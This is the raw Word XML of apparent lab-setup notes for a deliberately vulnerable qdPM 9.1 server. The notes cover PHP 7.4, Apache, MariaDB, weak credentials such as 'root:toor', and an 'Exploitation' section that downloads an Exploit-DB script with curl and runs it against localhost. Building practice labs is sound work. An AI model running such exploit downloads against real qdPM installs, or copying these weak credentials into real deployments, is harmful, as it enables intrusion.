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24ED" w14:textId="7F561FE3" w:rsidR="003070AC" w:rsidRDefault="003070AC" w:rsidP="003070AC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Removing php8 and installing php7.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA92657" w14:textId="2F401009" w:rsidR="003070AC" w:rsidRDefault="003070AC">
      <w:r w:rsidRPr="003070AC">
        <w:t>apt purge php</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003070AC">
        <w:t>8.*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003070AC">
        <w:t xml:space="preserve"> -y</w:t>
      </w:r>
      <w:r w:rsidR="00A54C1C">
        <w:t xml:space="preserve"> ||</w:t>
      </w:r>
      <w:r w:rsidRPr="003070AC">
        <w:t xml:space="preserve"> apt </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003070AC">
        <w:t>autoclean</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003070AC">
        <w:t xml:space="preserve"> -y &amp;&amp; apt </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003070AC">
        <w:t>autoremove</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003070AC">
        <w:t xml:space="preserve"> -y &amp;&amp; apt update -y &amp;&amp; apt install software-properties-common</w:t>
      </w:r>
      <w:r w:rsidR="00561389">
        <w:t xml:space="preserve"> -y</w:t>
      </w:r>
      <w:r w:rsidRPr="003070AC">
        <w:t xml:space="preserve"> &amp;&amp; add-apt-repository </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003070AC">
        <w:t>ppa:ondrej</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003070AC">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003070AC">
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003070AC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000D5ADC">
        <w:t xml:space="preserve">-y </w:t>
      </w:r>
      <w:r w:rsidRPr="003070AC">
        <w:t>&amp;&amp; apt-get update -y  &amp;&amp; apt install php7.4 php7.4-cli php7.4-json php7.4-common php7.4-mysql php7.4-zip php7.4-gd php7.4-mbstring php7.4-curl php7.4-xml php7.4-bcmath -y</w:t>
      </w:r>
      <w:r w:rsidR="00B334DC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A8DA92" w14:textId="50F34BBD" w:rsidR="006E7045" w:rsidRDefault="008562F0" w:rsidP="006E7045">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="006E7045">
        <w:t>nstall utilities</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49138E52" w14:textId="77777777" w:rsidR="00F76C20" w:rsidRDefault="00F76C20" w:rsidP="00F76C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t xml:space="preserve">apt install unzip curl </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  vim</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mariadb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-server apache2 python3-pip  python2  -y </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D2CB3A" w14:textId="77777777" w:rsidR="00F76C20" w:rsidRDefault="00F76C20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</w:p>
    <w:p w14:paraId="216FE082" w14:textId="1AD260A8" w:rsidR="00F76C20" w:rsidRDefault="00F76C20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t xml:space="preserve">curl </w:t>
      </w:r>
      <w:r w:rsidRPr="00F76C20">
        <w:t>https://bootstrap.pypa.io/pip/2.7/get-pip.py -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F76C20">
        <w:t>o  get-pip.py</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">  &amp;&amp; python2  get-pip.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A11887" w14:textId="77777777" w:rsidR="00F76C20" w:rsidRDefault="00F76C20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</w:p>
    <w:p w14:paraId="3270FF58" w14:textId="6A99C361" w:rsidR="00F76C20" w:rsidRDefault="00F76C20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F76C20">
        <w:t xml:space="preserve">cd /var/www/html &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F76C20">
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F76C20">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00136652">
        <w:t>https://altushost-swe.dl.sourceforge.net/project/qdpm/qdPM_9.1.zip &amp;&amp; unzip qdPM_9.1.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6851B512" w14:textId="77777777" w:rsidR="00F76C20" w:rsidRDefault="00F76C20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</w:p>
    <w:p w14:paraId="70B65101" w14:textId="4FAAD8F3" w:rsidR="00F16689" w:rsidRDefault="00F16689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F16689">
        <w:t>echo "&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F16689">
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F16689">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F16689">
        <w:t>phpinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F16689">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F16689">
        <w:t xml:space="preserve">); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F16689">
        <w:t>phpinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F16689">
        <w:t xml:space="preserve">(INFO_MODULES);?&gt;" &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F16689">
        <w:t>info.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F16689">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6969200A" w14:textId="77777777" w:rsidR="00F16689" w:rsidRDefault="00F16689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</w:p>
    <w:p w14:paraId="77316832" w14:textId="4B990FA1" w:rsidR="00EB5CD5" w:rsidRDefault="00EB5CD5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>chown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> -R </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>www-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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>data:</w:t>
      </w:r>
      <w:r w:rsidR="004E6F9F" w:rsidRPr="004E6F9F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>www</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004E6F9F" w:rsidRPr="004E6F9F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> /var/www/</w:t>
      </w:r>
      <w:r w:rsidR="004E6F9F"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>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F965C2" w14:textId="14D51D4C" w:rsidR="001B3655" w:rsidRDefault="001B3655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ED1AC13" w14:textId="21987856" w:rsidR="00C346E9" w:rsidRDefault="00C346E9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346E9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>echo "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C346E9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>root:toor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C346E9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">" | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C346E9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>chpasswd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="714D4F89" w14:textId="3DF121DF" w:rsidR="00DA50C3" w:rsidRDefault="00DA50C3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6ADBDD" w14:textId="42512C35" w:rsidR="00DA50C3" w:rsidRDefault="00DA50C3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proofErr w:type="gramStart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init.d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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="00136652">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp;&amp; </w:t>
      </w:r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init.d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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apache2</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA50C3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</w:p>
    <w:p w14:paraId="0FAD23FA" w14:textId="0049E51F" w:rsidR="00EB2BFA" w:rsidRDefault="00EB2BFA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9FDA0BB" w14:textId="77777777" w:rsidR="00EB2BFA" w:rsidRPr="00EB5CD5" w:rsidRDefault="00EB2BFA" w:rsidP="00EB2B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ptoor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-e "CREATE DATABASE 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qdpm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default charset utf8; CREATE USER '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qdpm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'@'localhost' IDENTIFIED BY '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StrongPasswordHere</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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';GRANT</w:t>
      </w:r>
      <w:proofErr w:type="gram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ALL PRIVILEGES ON qdpm.* TO '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qdpm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'@'localhost';"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE78BB0" w14:textId="31D15460" w:rsidR="00EB2BFA" w:rsidRDefault="00EB2BFA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69EC19D" w14:textId="503EB99B" w:rsidR="00002DA3" w:rsidRDefault="00002DA3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>docker cp /root/round_1/docker/ 616deb9c583d:/var/www/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11635D88" w14:textId="544FA29B" w:rsidR="00002DA3" w:rsidRDefault="00002DA3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>docker cp /root/round_1/docker/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>qdpm.sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> 616deb9c583d:/var/www/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5169FE1E" w14:textId="69BFED3F" w:rsidR="00002DA3" w:rsidRDefault="00002DA3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>p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toor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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qdpm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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/var/www/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qdpm</w:t>
      </w:r>
      <w:r w:rsidRPr="00002DA3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="02FD854C" w14:textId="52EF6E4E" w:rsidR="006567B7" w:rsidRDefault="006567B7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6677AEF" w14:textId="2AFFF2B8" w:rsidR="006567B7" w:rsidRDefault="006567B7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567B7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>chown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006567B7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -R </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006567B7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>www-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006567B7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data:www</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006567B7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006567B7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> /var/www/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380F58DB" w14:textId="77777777" w:rsidR="006567B7" w:rsidRDefault="006567B7" w:rsidP="00EB5C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7784E1C" w14:textId="48F3E318" w:rsidR="00EB5CD5" w:rsidRDefault="00BF2925">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF2925">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BF2925">
        <w:t xml:space="preserve"> nano /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF2925">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BF2925">
        <w:t>/apache2/apache2.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5BDCD2" w14:textId="5BA293D9" w:rsidR="00BF2925" w:rsidRDefault="00BF2925">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BF2925">
        <w:lastRenderedPageBreak/>
        <w:t>ServerName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BF2925">
        <w:t xml:space="preserve"> 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070EE213" w14:textId="14AFF147" w:rsidR="008562F0" w:rsidRDefault="008562F0"/>
    <w:p w14:paraId="3CC7F13B" w14:textId="37BA5F00" w:rsidR="00C82D0E" w:rsidRDefault="00C82D0E" w:rsidP="00C82D0E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Configuring servers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66201FB0" w14:textId="3FB0A166" w:rsidR="003B0FA4" w:rsidRDefault="003B0FA4" w:rsidP="003B0FA4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="12266E8A" w14:textId="657F77B4" w:rsidR="00C82D0E" w:rsidRDefault="00C82D0E" w:rsidP="00C82D0E">
      <w:r>
        <w:t xml:space="preserve">CREATE DATABASE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>qdpm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> default charset </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>utf8;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="676B568F" w14:textId="77777777" w:rsidR="00C82D0E" w:rsidRDefault="00C82D0E" w:rsidP="00C82D0E">
      <w:r>
        <w:t>CREATE USER '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>qdpm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>'@'localhost' IDENTIFIED BY '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>StrongPasswordHere</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>';</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1BE48F28" w14:textId="77777777" w:rsidR="00C82D0E" w:rsidRDefault="00C82D0E" w:rsidP="00C82D0E">
      <w:r>
        <w:t xml:space="preserve">GRANT ALL PRIVILEGES ON </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>qdpm.*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> TO '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>qdpm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>'@'localhost';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A54B7E4" w14:textId="77777777" w:rsidR="00C82D0E" w:rsidRDefault="00C82D0E" w:rsidP="00C82D0E">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>EXIT;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="34AD5E70" w14:textId="7DCC0D54" w:rsidR="001B3655" w:rsidRPr="00EB5CD5" w:rsidRDefault="00A04782" w:rsidP="001B3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ptoor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-e "CREATE DATABASE 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qdpm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default charset utf8; CREATE USER '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qdpm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'@'localhost' IDENTIFIED BY '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StrongPasswordHere</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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';GRANT</w:t>
      </w:r>
      <w:proofErr w:type="gram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 xml:space="preserve"> ALL PRIVILEGES ON qdpm.* TO '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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qdpm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04782">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'@'localhost';"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DB610A" w14:textId="54CA138B" w:rsidR="00C82D0E" w:rsidRDefault="00010457" w:rsidP="00C82D0E">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00010457">
        <w:t>mysqldump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00010457">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00010457">
        <w:t>uroot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00010457">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00010457">
        <w:t>ptoor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00010457">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00010457">
        <w:t>qdpm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00010457">
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00010457">
        <w:t>qdpm.sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="27301AB0" w14:textId="3C9FC726" w:rsidR="003B0FA4" w:rsidRDefault="003B0FA4" w:rsidP="003B0FA4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Apache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE44B3E" w14:textId="0C8A7B13" w:rsidR="003B0FA4" w:rsidRDefault="003B0FA4" w:rsidP="003B0FA4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mv </w:t>
      </w:r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>/var/www/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index.html </w:t>
      </w:r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>/var/www/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r w:rsidRPr="00EB5CD5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index.bak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="37A03097" w14:textId="77777777" w:rsidR="001C3321" w:rsidRPr="003B0FA4" w:rsidRDefault="001C3321" w:rsidP="003B0FA4"/>
    <w:p w14:paraId="31F5CDB0" w14:textId="59327780" w:rsidR="008562F0" w:rsidRDefault="008562F0" w:rsidP="008562F0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Installing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>qdpm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="61F0817B" w14:textId="152F9E54" w:rsidR="008562F0" w:rsidRDefault="00000000">
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidR="008562F0" w:rsidRPr="00B32FEA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.8.150/install/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="70ED53CA" w14:textId="77777777" w:rsidR="008562F0" w:rsidRDefault="008562F0"/>
    <w:p w14:paraId="706BA6DB" w14:textId="6CED206F" w:rsidR="00CB06E1" w:rsidRDefault="00CB06E1"/>
    <w:p w14:paraId="2D3DDB59" w14:textId="3914AB04" w:rsidR="00C82D0E" w:rsidRDefault="00C82D0E" w:rsidP="00CB06E1"/>
    <w:p w14:paraId="68F18F71" w14:textId="2D18403C" w:rsidR="00C82D0E" w:rsidRDefault="00000000" w:rsidP="00CB06E1">
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="001B27EE" w:rsidRPr="00B32FEA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>admin@localhost.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3F3A77D5" w14:textId="6125FCE1" w:rsidR="001B27EE" w:rsidRDefault="00AF7D18" w:rsidP="00AF7D18">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Created user:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA84083" w14:textId="093E9070" w:rsidR="001B27EE" w:rsidRDefault="005C3B30" w:rsidP="00CB06E1">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00811EE3">
        <w:t>developer_1@localhost.com:developer</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00811EE3">
        <w:t>_1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0CF311" w14:textId="4C518F50" w:rsidR="005C3B30" w:rsidRDefault="005C3B30" w:rsidP="00CB06E1"/>
    <w:p w14:paraId="6FF3C82E" w14:textId="73FB8189" w:rsidR="005C3B30" w:rsidRDefault="005C3B30" w:rsidP="005C3B30">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A04110" w14:textId="48127998" w:rsidR="00265E25" w:rsidRDefault="005C3B30" w:rsidP="005C3B30">
      <w:r w:rsidRPr="005C3B30">
        <w:t>curl https://www.exploit-db.com/raw/47954 &gt; exploit.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40667E83" w14:textId="371038AA" w:rsidR="008A6588" w:rsidRDefault="008A6588" w:rsidP="005C3B30"/>
    <w:p w14:paraId="045A99C5" w14:textId="4051731B" w:rsidR="008A6588" w:rsidRDefault="008A6588" w:rsidP="005C3B30">
      <w:r>
        <w:t>Add the below line in the top</w:t>
      </w:r>
      <w:r w:rsidR="003D1708">
        <w:t xml:space="preserve"> in exploit.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF1BC8A" w14:textId="07CF8D25" w:rsidR="008A6588" w:rsidRDefault="008A6588" w:rsidP="005C3B30">
      <w:r w:rsidRPr="008A6588">
        <w:t># -*- coding: utf-8 -*-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D491760" w14:textId="77777777" w:rsidR="008A6588" w:rsidRDefault="008A6588" w:rsidP="005C3B30"/>
    <w:p w14:paraId="6835EBB6" w14:textId="16427DDB" w:rsidR="00265E25" w:rsidRDefault="00265E25" w:rsidP="00265E25">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Installing Python2 for exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE302F1" w14:textId="55551FA2" w:rsidR="00265E25" w:rsidRDefault="00265E25" w:rsidP="00265E25">
      <w:r w:rsidRPr="00265E25">
        <w:t xml:space="preserve">apt install </w:t>
      </w:r>
      <w:r w:rsidR="00B334DC">
        <w:t xml:space="preserve">python2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00265E25">
        <w:t>python-pip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D1DA3C" w14:textId="565F5085" w:rsidR="00265E25" w:rsidRDefault="00265E25" w:rsidP="00265E25">
      <w:r w:rsidRPr="00265E25">
        <w:t xml:space="preserve">pip2 install requests </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007C4850">
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="00265E25">
        <w:t>xml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2899A93A" w14:textId="28214770" w:rsidR="00596BE6" w:rsidRDefault="00596BE6" w:rsidP="00265E25"/>
    <w:p w14:paraId="62FED971" w14:textId="3E2CF909" w:rsidR="00D70B66" w:rsidRPr="00265E25" w:rsidRDefault="00D70B66" w:rsidP="00D70B66">
      <w:r w:rsidRPr="00596BE6">
        <w:t>python2 exploit.py -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00596BE6">
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00596BE6">
        <w:t xml:space="preserve"> http://</w:t>
      </w:r>
      <w:r>
        <w:t>127.0.0.1</w:t>
      </w:r>
